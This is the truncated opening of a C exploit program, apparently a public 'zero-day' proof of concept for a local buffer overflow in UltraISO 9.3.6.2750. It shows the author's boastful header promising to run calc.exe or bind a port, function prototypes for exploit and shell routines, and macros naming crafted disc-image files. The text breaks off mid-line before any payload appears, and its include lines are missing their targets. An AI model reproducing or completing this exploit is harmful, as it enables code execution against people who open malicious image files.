/* Ultraiso local buffer overflow exploit(0day) This 0day is kickass from fl0 fl0w a.k.a Stefan! Run calc.exe or bind port and hack ,fuck antisecurity. Thanks to George Nicolaou one of the best there is! */ #include #include #include void print(char*); unsigned int getFsize(FILE*,char*); void gen_random(char*,const int); void exploit(char*,char*); void printshell(); #define IM "testf.img" #define CC "testf.ccd" #define VER "9.3.6.2750" #define POCNAME "Ultraiso local buffer overflow exploit(0day)" #define AUTHOR "fl0 fl0w" #define IF(x,NULL) if(x==NULL) #define FOR(i,a,b) for(i=a;i